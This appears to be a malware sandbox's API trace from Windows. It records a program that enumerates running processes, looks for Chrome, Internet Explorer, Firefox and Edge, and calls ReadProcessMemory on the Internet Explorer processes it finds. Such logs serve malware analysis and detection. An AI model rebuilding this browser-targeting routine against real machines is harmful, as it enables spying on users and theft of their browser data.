	[0237.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.663] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.663] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0237.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.664] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.664] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.664] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x7b9c
	[0237.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.665] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.665] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.665] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.666] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.666] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0237.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x7ba0
	[0237.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.668] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0237.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.668] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.668] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0237.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.669] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.669] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0237.670] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7ba4
	[0237.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.670] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0237.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.670] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.670] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0237.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.671] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.671] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0237.672] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x7ba8
	[0237.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.672] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0237.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.672] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.672] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0237.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.672] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.673] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0237.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x7bac
	[0237.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.673] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0237.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.674] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.674] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0237.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.674] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.675] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0237.675] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0237.675] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0237.676] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x7bb0
	[0237.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.676] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0237.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.677] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.677] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0237.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.678] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.678] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0237.679] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7bb4
	[0237.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.679] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0237.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.680] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.680] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0237.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.680] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.680] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0237.681] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x7bb8
	[0237.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.681] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0237.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.682] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.683] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0237.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.683] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.684] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0237.684] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x7bbc
	[0237.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.685] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0237.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.685] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.685] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0237.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.686] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.686] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0237.687] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x7bc0
	[0237.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.687] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0237.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.688] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.688] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0237.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.689] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.689] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0237.690] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x7bc4
	[0237.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.690] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0237.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.691] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.691] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0237.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.691] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.691] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0237.692] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x7bc8
	[0237.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.692] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0237.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.693] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.693] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0237.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.694] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.694] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0237.695] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x7bcc
	[0237.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.695] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0237.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.696] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.696] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0237.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.697] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.697] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0237.705] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x7bd0
	[0237.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.705] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0237.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.705] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.706] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0237.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.706] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.706] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0237.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7bd4
	[0237.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.707] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0237.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.707] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.708] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0237.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.708] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.708] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0237.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x7bd8
	[0237.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.709] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0237.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.709] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.710] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0237.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.710] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.711] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0237.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7bdc
	[0237.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.712] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0237.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.712] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.713] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0237.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.714] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.714] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0237.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x7be0
	[0237.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.715] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0237.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.716] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.716] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0237.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.717] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.717] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0237.718] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7be4
	[0237.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.718] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0237.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.719] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.719] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0237.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.720] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.720] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0237.721] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x7be8
	[0237.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.721] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0237.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.722] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.722] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0237.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.723] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.723] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0237.724] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x7bec
	[0237.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.724] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0237.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.724] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0237.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.724] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0237.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.725] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.725] NtQueryInformationProcess (in: ProcessHandle=0x7bec, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0237.725] ReadProcessMemory (in: hProcess=0x7bec, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0237.725] ReadProcessMemory (in: hProcess=0x7bec, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0237.725] ReadProcessMemory (in: hProcess=0x7bec, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0237.725] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0237.726] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0237.726] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x7bf0
	[0237.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.726] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0237.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.727] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0237.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.727] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0237.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.727] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.727] NtQueryInformationProcess (in: ProcessHandle=0x7bf0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0237.728] ReadProcessMemory (in: hProcess=0x7bf0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0237.728] ReadProcessMemory (in: hProcess=0x7bf0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
